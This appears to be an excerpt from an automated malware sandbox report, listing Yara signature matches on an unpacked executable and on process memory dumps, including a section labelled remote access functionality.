Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY